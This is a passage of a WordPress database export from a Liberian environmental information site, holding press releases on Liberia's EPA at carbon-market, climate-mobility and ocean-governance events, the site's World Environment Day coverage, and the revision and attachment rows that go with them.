Africa.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>About the West African Alliance on Carbon Markets and Climate Finance</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The West African Alliance on Carbon Markets and Climate Finance is an initiative created by and for West African countries in 2017. Driven by the needs of its members, the Alliance aims to enhance the position of West African countries in international carbon markets, benefit from technology transfers, and access result-based climate finance for NDC implementation. Its membership includes Benin, Burkina Faso, Cape Verde, Côte d’Ivoire, The Gambia, Ghana, Guinea, Guinea-Bissau, Liberia, Mali, Mauritania, Niger, Nigeria, Senegal, Sierra Leone, and Togo.</p>\n<!-- /wp:paragraph -->','Liberia Advocates for Regional Collaboration in Carbon Markets at West Africa Carbon Market Hub Workshop','','publish','open','open','','liberia-advocates-for-regional-collaboration-in-carbon-markets-at-west-africa-carbon-market-hub-workshop','','','2025-06-02 09:48:02','2025-06-02 09:48:02','',0,'https://ekmsliberia.info/?p=5441',60,'post','',0),(5442,38,'2025-06-02 09:46:28','2025-06-02 09:46:28','','New today1','','inherit','open','closed','','new-today1','','','2025-06-02 09:46:28','2025-06-02 09:46:28','',5441,'https://ekmsliberia.info/wp-content/uploads/2025/06/New-today1.jpeg',0,'attachment','image/jpeg',0),(5443,38,'2025-06-02 09:48:00','2025-06-02 09:48:00','<!-- wp:paragraph -->\n<p><strong>DAKAR, Senegal – June 2, 2025</strong> – In a significant move towards fostering regional cooperation in climate action, Dr. Emmanuel K. Urey Yarkpawolo, the Executive Director of Liberia’s Environmental Protection Agency (EPA) and Ambassador to the West African Carbon Alliance and Climate Finance, addressed participants at the West Africa Carbon Market Hub Workshop in Dakar. This event, held at the RIU BAOBAB Hotel, marks the second workshop of its kind, following the inaugural session in Ivory Coast.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop gathered a diverse assembly of ministers, diplomats, and environmental dignitaries from West Africa. It aimed to enhance policymaker capacities and promote collaboration between project developers and service providers. Central to the discussions was the critical importance of Article 6 of the Paris Agreement, designed to facilitate effective benefit-sharing and knowledge exchange in carbon markets.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo underscored the pressing need for regional solidarity in building effective carbon markets, asserting that such alliances are essential for economic sovereignty. \"In an era where multilateralism and international climate finance face significant challenges, it is vital that we strengthen our collaborations to innovate and address poverty in our region,\" he stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Highlighting Liberia\'s proactive stance, The EPA boss reiterated the commitment of President Joseph N. Boakai, Sr. to engage in carbon trading. This initiative aims to harness carbon credits for the conservation of Liberia’s forests and mangroves, which represent over 40 percent of the remaining forest cover in West Africa. Liberia\'s ambitious five-year developmental strategy, the ARREST Agenda for Inclusive Development (AAID), seeks to generate $8.4 billion, with the EPA tasked with securing a portion of this funding through carbon market initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Executive Director announced Liberia\'s progress towards achieving a 64% reduction in greenhouse gas emissions by 2030 in comparison to business-as-usual scenarios. Despite contributing minimally to global climate change, he mentioned that Liberia faces severe impacts from its effects, leading to a focus on climate adaptation in its revised Nationally Determined Contributions (NDCs) 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo expressed appreciation for the ongoing support from the West African Alliance and its partners, recognizing their role in bolstering Liberia’s capacity to address climate challenges, particularly with Article 6 of the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In concluding his remarks, he called for a comprehensive platform for West African nations to access finance that could drive sustainable development and effective climate actions. He expressed optimism that the outcomes of the workshop would be transformative, highlighting the necessity for carbon pricing mechanisms that accurately reflect the environmental and social values of reduced emissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With the urgent call for regional collaboration resonating among participants, the West Africa Carbon Market Hub Workshop represents a pivotal step in advancing sustainable development and climate resilience across West Africa.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>About the West African Alliance on Carbon Markets and Climate Finance</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The West African Alliance on Carbon Markets and Climate Finance is an initiative created by and for West African countries in 2017. Driven by the needs of its members, the Alliance aims to enhance the position of West African countries in international carbon markets, benefit from technology transfers, and access result-based climate finance for NDC implementation. Its membership includes Benin, Burkina Faso, Cape Verde, Côte d’Ivoire, The Gambia, Ghana, Guinea, Guinea-Bissau, Liberia, Mali, Mauritania, Niger, Nigeria, Senegal, Sierra Leone, and Togo.</p>\n<!-- /wp:paragraph -->','Liberia Advocates for Regional Collaboration in Carbon Markets at West Africa Carbon Market Hub Workshop','','inherit','closed','closed','','5441-revision-v1','','','2025-06-02 09:48:00','2025-06-02 09:48:00','',5441,'https://ekmsliberia.info/?p=5443',0,'revision','',0),(5448,38,'2025-06-11 11:57:33','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – June 11, 2025: The Republic of Liberia has officially become the 151st Member State of the Intergovernmental Oceanographic Commission (IOC) of UNESCO, marking a significant milestone in the country’s commitment to ocean governance, climate action, and coastal zone management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The announcement was made in an official circular (No. 3040) from the IOC Secretariat on May 20, 2025, confirming that Liberia’s membership took effect on May 14, 2025. The membership was facilitated by a formal recommendation from the Ministry of Foreign Affairs, under the leadership of Minister Sara Beysolow Nyanti.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of this new partnership, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency (EPA) of Liberia, has been designated as the country’s official focal point for the IOC. He is scheduled to represent Liberia at the 33rd Session of the IOC Assembly in Paris, France, from June 25 to July 3, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo expressed gratitude to the Liberian government and Minister Nyanti for the confidence reposed in him.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I am very grateful to the Government of Liberia through Minister Sara Beysolow Nyanti for the recommendation,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The IOC is the only United Nations body specializing in ocean science and services, playing a pivotal role in coordinating global efforts around marine research, oceanographic data, and coastal sustainability. Liberia’s accession positions the country to benefit from international expertise and capacity development on climate change, marine spatial planning, and coastal erosion mitigation—issues critical to the nation’s environmental survival and coastal communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a formal response letter dated May 20, 2025, Mr. Vidar Helgesen, Executive Secretary of the IOC, welcomed Liberia to the Commission and acknowledged the appointment of Dr. Urey Yarkpawolo. He also encouraged national authorities to liaise with the IOC Sub-Commission for Africa (IOCAFRICA) and designate a national coordinating body for improved coordination.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The letter further recognized Liberia’s priorities, particularly in tackling coastal erosion and promoting sustainable marine development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The move is consistent with Liberia’s ongoing efforts to address environmental challenges and increase its engagement in multilateral platforms for science-based policymaking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Established under UNESCO, the IOC fosters international cooperation in ocean science to improve management of the ocean, coasts, and marine resources. Its work includes ocean observation systems, tsunami warnings, and capacity building.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With Liberia’s accession, the IOC now boasts 151 Member States, advancing collective actions on the UN Decade of Ocean Science for Sustainable Development (2021–2030).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia will formalize the establishment of a national coordinating body for IOC liaison and will begin integrating with regional initiatives such as IOCAFRICA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As a national focal point, Dr. Urey Yarkpawolo is expected to lead engagements that position Liberia at the forefront of regional marine research and ocean governance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>30</p>\n<!-- /wp:paragraph -->','Liberia Gains IOC-UNESCO Membership; Dr. Yarkpawolo to Lead as National Representative','','draft','open','open','','','','','2025-06-11 11:57:33','2025-06-11 11:57:33','',0,'https://ekmsliberia.info/?p=5448',59,'post','',0),(5449,38,'2025-06-17 11:45:10','2025-06-17 11:45:10','<!-- wp:paragraph -->\n<p>(Berlin, Germany – June 17, 2025)– Liberia’s Environmental Protection Agency (EPA) Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has told world leaders that climate change is driving thousands of Liberians from their homes and threatening the country’s future. He made the statement at the Berlin Climate Mobility Forum, held at the Robert Bosch Stiftung in Germany from June 16–17, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of President Joseph Nyuma Boakai and the people of Liberia, Dr. Urey Yarkpawolo said that climate change is not just about the environment anymore—it is causing insecurity, suffering, and mass movement of people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are already seeing the impact in Liberia. In 2024 alone, over 100,000 people were affected by flooding in more than 75 communities,” he said. “Homes, schools, and health centers were destroyed. Families were left with nowhere to go.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the country is facing both internal and cross-border climate-related displacement. During a recent visit to Grand Gedeh and River Gee counties, he witnessed the arrival of thousands of migrants from Burkina Faso, driven out of their country by worsening drought and violence in the Sahel region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These young Burkinabe men, estimated between 60,000 to 80,000, are coming into Liberia to farm cocoa. But this is creating pressure on our land, increasing land disputes, and causing tension in local communities,” Dr. Urey Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also spoke about conversations with Ivorian officials during the West African Carbon Market Conference in Dakar. They confirmed that similar climate pressures are pushing people south into Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo stressed that while Liberia is struggling with the effects of climate change, it remains one of the world’s key protectors of tropical rainforests. He said these forests help absorb carbon dioxide and fight global warming. Yet, Liberia receives little support for the role it plays in protecting the planet.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is doing more to reduce the impact of climate change than it causes,” the EPA Executive Director said. “But we are left to suffer its worst effects.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that climate-related migration should not be treated as a stand-alone issue but as part of broader development and human rights efforts. “People need support to stay where they are if they can. And if they must move, it should be safe and with dignity,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo announced that Liberia is taking action through its National Adaptation Plan, updating its Nationally Determined Contributions, and making climate mobility a priority under the ARREST Agenda for Inclusive Development led by President Boakai.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he emphasized that Liberia cannot do it alone and called on international partners to:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.⁠ ⁠Increase climate financing, especially for vulnerable countries</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2.⁠ ⁠Support stronger early warning systems and infrastructure</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>3.⁠ ⁠Invest in data and research about climate mobility</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>4.⁠ ⁠Promote policies that protect people forced to move due to climate</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The choices we make now will affect our people and the world for generations,” he said. “Liberia is ready to work with others to respond to climate displacement and build a safer, fairer world.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Berlin Climate Mobility Forum was organized by the Robert Bosch Stiftung and the Global Centre for Climate Mobility. It brought together decision-makers, experts, and partners from different sectors to talk about the link between climate change and migration. The event focused on real solutions, early warning systems, and funding support. It was held after the UN Ocean Conference in Nice and during the climate meetings in Bonn (SB62).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The forum aimed to find new ways to respond to climate mobility by building partnerships and including local experiences in global planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-30-</p>\n<!-- /wp:paragraph -->','\"Climate Change Is Displacing Liberians\"….EPA Executive Director Raises Alarm in Berlin','','publish','open','open','','climate-change-is-displacing-liberians-epa-executive-director-raises-alarm-in-berlin','','','2025-06-17 12:11:51','2025-06-17 12:11:51','',0,'https://ekmsliberia.info/?p=5449',58,'post','',0),(5450,38,'2025-06-17 11:44:55','2025-06-17 11:44:55','','ED pic','','inherit','open','closed','','ed-pic','','','2025-06-17 11:44:55','2025-06-17 11:44:55','',5449,'https://ekmsliberia.info/wp-content/uploads/2025/06/ED-pic.jpeg',0,'attachment','image/jpeg',0),(5451,38,'2025-06-17 11:45:10','2025-06-17 11:45:10','<!-- wp:paragraph -->\n<p>(Berlin, Germany – June 17, 2025)– Liberia’s Environmental Protection Agency (EPA) Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has told world leaders that climate change is driving thousands of Liberians from their homes and threatening the country’s future. He made the statement at the Berlin Climate Mobility Forum, held at the Robert Bosch Stiftung in Germany from June 16–17, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of President Joseph Nyuma Boakai and the people of Liberia, Dr. Urey Yarkpawolo said that climate change is not just about the environment anymore—it is causing insecurity, suffering, and mass movement of people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are already seeing the impact in Liberia. In 2024 alone, over 100,000 people were affected by flooding in more than 75 communities,” he said. “Homes, schools, and health centers were destroyed. Families were left with nowhere to go.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the country is facing both internal and cross-border climate-related displacement. During a recent visit to Grand Gedeh and River Gee counties, he witnessed the arrival of thousands of migrants from Burkina Faso, driven out of their country by worsening drought and violence in the Sahel region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These young Burkinabe men, estimated between 60,000 to 80,000, are coming into Liberia to farm cocoa. But this is creating pressure on our land, increasing land disputes, and causing tension in local communities,” Dr. Urey Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also spoke about conversations with Ivorian officials during the West African Carbon Market Conference in Dakar. They confirmed that similar climate pressures are pushing people south into Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo stressed that while Liberia is struggling with the effects of climate change, it remains one of the world’s key protectors of tropical rainforests. He said these forests help absorb carbon dioxide and fight global warming. Yet, Liberia receives little support for the role it plays in protecting the planet.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is doing more to reduce the impact of climate change than it causes,” the EPA Executive Director said. “But we are left to suffer its worst effects.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that climate-related migration should not be treated as a stand-alone issue but as part of broader development and human rights efforts. “People need support to stay where they are if they can. And if they must move, it should be safe and with dignity,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo announced that Liberia is taking action through its National Adaptation Plan, updating its Nationally Determined Contributions, and making climate mobility a priority under the ARREST Agenda for Inclusive Development led by President Boakai.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he emphasized that Liberia cannot do it alone and called on international partners to:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.⁠ ⁠Increase climate financing, especially for vulnerable countries</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2.⁠ ⁠Support stronger early warning systems and infrastructure</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>3.⁠ ⁠Invest in data and research about climate mobility</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>4.⁠ ⁠Promote policies that protect people forced to move due to climate</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The choices we make now will affect our people and the world for generations,” he said. “Liberia is ready to work with others to respond to climate displacement and build a safer, fairer world.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Berlin Climate Mobility Forum was organized by the Robert Bosch Stiftung and the Global Centre for Climate Mobility. It brought together decision-makers, experts, and partners from different sectors to talk about the link between climate change and migration. The event focused on real solutions, early warning systems, and funding support. It was held after the UN Ocean Conference in Nice and during the climate meetings in Bonn (SB62).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The forum aimed to find new ways to respond to climate mobility by building partnerships and including local experiences in global planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-30-</p>\n<!-- /wp:paragraph -->','\"Climate Change Is Displacing Liberians\"….EPA Executive Director Raises Alarm in Berlin','','inherit','closed','closed','','5449-revision-v1','','','2025-06-17 11:45:10','2025-06-17 11:45:10','',5449,'https://ekmsliberia.info/?p=5451',0,'revision','',0),(5453,38,'2025-06-17 12:17:04','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>With a Strong Call to #BeatPlasticPollution</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":6} -->\n<h6 class=\"wp-block-heading\">JUNE 6, 2025</h6>\n<!-- /wp:heading -->\n\n<!-- wp:image -->\n<figure class=\"wp-block-image\"><img src=\"https://www.undp.org/sites/g/files/zskgke326/files/2025-06/trash2.jpeg\" alt=\"A cluttered beach strewn with garbage and makeshift huts in the background.\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To mark World Environment Day 2025, UNDP Liberia Resident Representative Aliou Dia called for strong regulatory frameworks, improved enforcement, and enhanced recycling infrastructure to combat the growing plastic pollution crisis.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The event, held on June 5, 2025, at Paynesville Town Hall in Monrovia, was themed \"End Plastic Pollution\" and supported by the local slogan \"Reduce, Reuse, Recycle.\" It convened stakeholders, youth leaders, and women’s groups from across society to reaffirm Liberia’s commitment to environmental sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the keynote address at the event, organized by the Government of Liberia through the Environmental Protection Agency (EPA) with support from UNDP, Dia emphasized that tackling plastic pollution demands a whole-of-society response.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Strengthening Collaboration &amp; Policy Reform</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The government must lead with bold policies and strict enforcement. The private sector must innovate and invest in recycling and circular economy solutions. Communities, particularly women and youth, must be empowered to lead local initiatives—from cleanup campaigns to public education,” he stressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dia underscored the critical role of interagency cooperation among key government entities, including the EPA, National Fisheries and Aquaculture Authority, Ministry of Commerce and Industry, Ministry of Finance &amp; Development Planning, and Liberia Revenue Authority.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Together, these institutions can create an enabling policy environment and drive collective action. Liberia must also leverage international support,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Through the Global Environment Facility’s (GEF) 9th replenishment, nations can access resources to combat plastic pollution, focusing on policy reform, circular economy initiatives, and improved waste management systems. Stakeholders at the event urged increased investment in waste management infrastructure, biodegradable alternatives, and sustainable practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Women &amp; Youth: Catalysts for Change</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dia emphasized the pivotal role of women and youth in community-driven environmental action. He noted that their energy, creativity, and leadership are vital in transforming consumption habits and promoting sustainable alternatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With proper training, support, and recognition, they can become powerful agents of change in the fight against plastic waste. He urged the government to reduce reliance on single-use plastics by investing in biodegradable alternatives, eco-innovations, and responsible production and consumption practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The future we envision is one where Liberia thrives with a circular economy, resilient ecosystems, and empowered citizens,” he affirmed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>UNDP &amp; EPA’s Commitment to a Cleaner Liberia</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dia reaffirmed UNDP’s dedication to a greener, healthier, and more sustainable Liberia through its Energy and Environment Programme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We support initiatives that enhance waste management, promote climate resilience, and conserve biodiversity. We are proud to partner with the Government of Liberia and civil society in tackling plastic pollution head-on,” he stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director Dr. Emmanuel Yarkpawolo echoed these concerns, outlining Liberia’s national efforts to address the crisis.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We have launched a series of awareness and cleanup activities across counties, including school debates, art competitions, and environmental quizzes to engage the youth. This is more than a celebration—it is a national call to action,” he emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Ongoing Initiatives and Outlook</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The observance featured plastic collection drives in wetlands and mangroves, visits to recycling facilities, community clean-up campaigns, and media outreach to raise awareness on plastic waste hazards, spanning activities from May to early June 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dignitaries at the event stressed the need for stronger interagency collaboration. Environmental NGOs, the Forestry Development Agency, civil society organizations, and other entities reaffirmed their commitment to supporting policy development, enforcement measures, and eco-innovation initiatives in partnership with the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Looking ahead, stakeholders continue to push for greater investment in waste management infrastructure, biodegradable alternatives, and circular economy practices. Liberia is exploring additional funding opportunities through GEF-9 to support policy reform and capacity building.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>A Call to Action</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Earlier in the event, Miss Leona P. Duweh, EPA Awareness Officer, urged attendees to act against plastic pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I encourage all of us to actively contribute—if not immediately, then gradually—to ending plastic pollution. The first step is applying the Three Rs: Reduce, Reuse, and Recycle,” she emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In closing, Mr. Louis Kuukpen, UNDP Deputy Resident Representative, urged participants to embrace responsible waste management and become agents of change in the fight against plastic pollution.</p>\n<!-- /wp:paragraph -->','Liberia Joins the World in Observing World Environment Day ','','draft','open','open','','','','','2025-06-17 12:17:04','2025-06-17 12:17:04','',0,'https://ekmsliberia.info/?p=5453',57,'post','',0),(5454,38,'2025-06-19 12:22:18','2025-06-19 12:22:18','<!-- wp:paragraph -->\n<p>(Berlin, June 19, 2025)_For the first time in the nation’s history, Liberia is taking a bold and structured step to respond to the rising threat of climate-induced migration. On June 17, 2025, the Executive Director and CEO of the Environmental Protection Agency (EPA), Dr. Emmanuel King Urey Yarkpawolo, signed a landmark agreement at the Berlin Climate Mobility Forum, launching Liberia’s journey toward developing a National Climate Mobility Strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The agreement paves the way for the EPA to conduct a comprehensive Climate Mobility Assessment—a major move that will examine how climate change is forcing people to relocate within Liberia and what policies must be put in place to protect them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The signing took place during a high-level session at the Berlin forum, attended by global climate leaders, policymakers, and civil society actors. Liberia’s participation and leadership at the forum demonstrated not only its vulnerability but also its commitment to solutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is no longer a distant threat—it is a current reality that is reshaping lives and livelihoods,” said Dr. Urey Yarkpawolo. “Through this agreement, we are committing to assess the scale and nature of climate-induced mobility and to craft a national strategy that safeguards vulnerable communities while ensuring sustainable development.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Climate Mobility Assessment will involve:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.⁠ ⁠Gathering data on at-risk populations and areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2.⁠ ⁠Holding national and community consultations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>3.⁠ ⁠Mapping movement trends linked to environmental impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>4.⁠ ⁠Integrating climate mobility into disaster planning and development policies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The findings will guide the creation of Liberia’s first-ever National Climate Mobility Strategy—a long-term plan that ensures those displaced by climate disasters are not forgotten or left behind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held under the theme “Pathways to Protection: Addressing Climate Mobility through Policy and Practice,” the Berlin Climate Mobility Forum gave Liberia a global stage to raise awareness and secure partnerships.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This move aligns with Liberia’s obligations under the Paris Agreement and shows that the country is not waiting for disaster to strike before taking action. Instead, it is stepping up, showing leadership, and preparing its systems and communities for the future.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"This is the first time in Liberia’s history that a focused, data-driven initiative will be undertaken to understand and address climate-induced migration. It is not just a policy move—it is a people-first strategy to ensure that climate justice reaches every corner of the country, \"Dr. Urey Yarkpawolo added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>                            -30-</code></pre>\n<!-- /wp:code -->','EPA Leads Liberia’s First National Plan to Address Climate-Induced Migration','','publish','open','open','','epa-leads-liberias-first-national-plan-to-address-climate-induced-migration','','','2025-06-24 06:52:01','2025-06-24 06:52:01','',0,'https://ekmsliberia.info/?p=5454',56,'post','',0),(5455,38,'2025-06-19 12:22:01','2025-06-19 12:22:01','','project_20250619_1019196-01','','inherit','open','closed','','project_20250619_1019196-01','','','2025-06-19 12:22:01','2025-06-19 12:22:01','',5454,'https://ekmsliberia.info/wp-content/uploads/2025/06/project_20250619_1019196-01.png',0,'attachment','image/png',0),(5456,38,'2025-06-19 12:22:18','2025-06-19 12:22:18','<!-- wp:paragraph -->\n<p>(Berlin, June 19, 2025)_For the first time in the nation’s history, Liberia is taking a bold and structured step to respond to the rising threat of climate-induced migration. On June 17, 2025, the Executive Director and CEO of the Environmental Protection Agency (EPA), Dr. Emmanuel King Urey Yarkpawolo, signed a landmark agreement at the Berlin Climate Mobility Forum, launching Liberia’s journey toward developing a National Climate Mobility Strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The agreement paves the way for the EPA to conduct a comprehensive Climate Mobility Assessment—a major move that will examine how climate change is forcing people to relocate within Liberia and what policies must be put in place to protect them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The signing took place during a high-level session at the Berlin forum, attended by global climate leaders, policymakers, and civil society actors. Liberia’s participation and leadership at the forum demonstrated not only its vulnerability but also its commitment to solutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is no longer a distant threat—it is a current reality that is reshaping lives and livelihoods,” said Dr. Urey Yarkpawolo. “Through this agreement, we are committing to assess the scale and nature of climate-induced mobility and to craft a national strategy that safeguards vulnerable communities while ensuring sustainable development.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Climate Mobility Assessment will involve:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.⁠ ⁠Gathering data on at-risk populations and areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2.⁠ ⁠Holding national and community consultations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>3.⁠ ⁠Mapping movement trends linked to environmental impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>4.⁠ ⁠Integrating climate mobility into disaster planning and development policies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The findings will guide the creation of Liberia’s first-ever National Climate Mobility Strategy—a long-term plan that ensures those displaced by climate disasters are not forgotten or left behind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held under the theme “Pathways to Protection: Addressing Climate Mobility through Policy and Practice,” the Berlin Climate Mobility Forum gave Liberia a global stage to raise awareness and secure partnerships.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This move aligns with Liberia’s obligations under the Paris Agreement and shows that the country is not waiting for disaster to strike before taking action. Instead, it is stepping up, showing leadership, and preparing its systems and communities for the future.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"This is the first time in Liberia’s history that a focused, data-driven initiative will be undertaken to understand and 